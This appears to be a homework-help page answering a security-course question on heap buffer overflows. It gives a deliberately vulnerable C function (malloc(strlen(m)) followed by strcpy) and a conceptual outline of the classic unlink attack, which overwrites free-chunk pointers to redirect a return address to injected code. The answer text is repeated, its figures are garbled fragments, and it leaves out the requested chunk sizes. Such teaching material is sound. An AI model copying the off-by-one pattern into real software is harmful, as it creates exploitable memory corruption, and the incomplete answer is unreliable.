Write a testing program that contains a heap buffer overflow vulnerability. Show

Question

Write a testing program that contains a heap buffer overflow vulnerability. Show what the heap layout looks like and explain how to exploit it. In particular, please include in your diagram: (1) each chunk of memory allocated by malloc(), (2) their sizes in bytes, (3) metadata of heap as it gets overwritten, (4) the sizes of this metadata in bytes, and (5) which metadata get overwritten and how the attacker controls which value can get written to any arbitrary location in memory. Again, you do not need to write the real exploit code, but you may want to use some figures to make your description clear and concise.

Explanation / Answer

Memory management in C is very important for allocating the memory for local variable, global variable and dynamic allocation. They are Automatic, Static and Dynamic memory allocations. Appropriate use of memory allocation is responsible by the programmer.

The figure shows the layout of process memory

Addresses in Highß

     

Addresses in Lowß

Arguments/ Environment

Stack

Stack grows down

Heap grows up    

Unused and Mapped Memory

Heap (Dynamic data)

Static Data

Program Code

Heap based buffer overflow: If a program have a buffer overflow vulnerability for a buffer allocated on the heap, there is no return address close at hand. We can describe two things that are Overwriting a function pointer and Overwriting heap metadata

Heap Overflow Overwriting a function pointer example

void heaps(const char *m)

{    char *n = malloc(strlen(m));

    strcpy(n, m);

}

The function heaps asks for one too few bytes from the heap and then writes beyond the end. What's insidious about that is that some of the time - even most of the time - it will seem to work because the heap system allocates more space than you request. However, you might trample on control data, and then all stakes are off. The heap overflow is very small, and hard to detect.

Overwriting heap metadata: The heap is a memory area where dynamically allocated data is stored. It managed by a memory allocation library that offers functionality to allocate and free chunks of memory. We can use in malloc() and free() functions.

Below figure shows this function that malloc maintains a doubly linked list of free chunks When chunk c gets unlinked, c’s backward pointer is written to * (forward pointer+12) Or: green value is written 12 bytes above where red value points.

Exploiting a buffer overrun Green: value is written 12 bytes above where red value points A buffer overrun in d can overwrite the red and green values. Make Green point to injected code Make Red point 12 bytes below a function return address

Memory management in C is very important for allocating the memory for local variable, global variable and dynamic allocation. They are Automatic, Static and Dynamic memory allocations. Appropriate use of memory allocation is responsible by the programmer.

The figure shows the layout of process memory

Addresses in Highß

     

Addresses in Lowß

Arguments/ Environment

Stack

Stack grows down

Heap grows up    

Unused and Mapped Memory

Heap (Dynamic data)

Static Data

Program Code

Heap based buffer overflow: If a program have a buffer overflow vulnerability for a buffer allocated on the heap, there is no return address close at hand. We can describe two things that are Overwriting a function pointer and Overwriting heap metadata

Heap Overflow Overwriting a function pointer example

void heaps(const char *m)

{    char *n = malloc(strlen(m));

    strcpy(n, m);

}

The function heaps asks for one too few bytes from the heap and then writes beyond the end. What's insidious about that is that some of the time - even most of the time - it will seem to work because the heap system allocates more space than you request. However, you might trample on control data, and then all stakes are off. The heap overflow is very small, and hard to detect.

Overwriting heap metadata: The heap is a memory area where dynamically allocated data is stored. It managed by a memory allocation library that offers functionality to allocate and free chunks of memory. We can use in malloc() and free() functions.

Below figure shows this function that malloc maintains a doubly linked list of free chunks When chunk c gets unlinked, c’s backward pointer is written to * (forward pointer+12) Or: green value is written 12 bytes above where red value points.

Exploiting a buffer overrun Green: value is written 12 bytes above where red value points A buffer overrun in d can overwrite the red and green values. Make Green point to injected code Make Red point 12 bytes below a function return address

Addresses in Highß

     

Addresses in Lowß

Arguments/ Environment

Stack

Stack grows down

Heap grows up    

Unused and Mapped Memory

Heap (Dynamic data)

Static Data

Program Code

Related Questions

Navigate

• Browse (All)
• Browse W
• Subjects

---

---

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.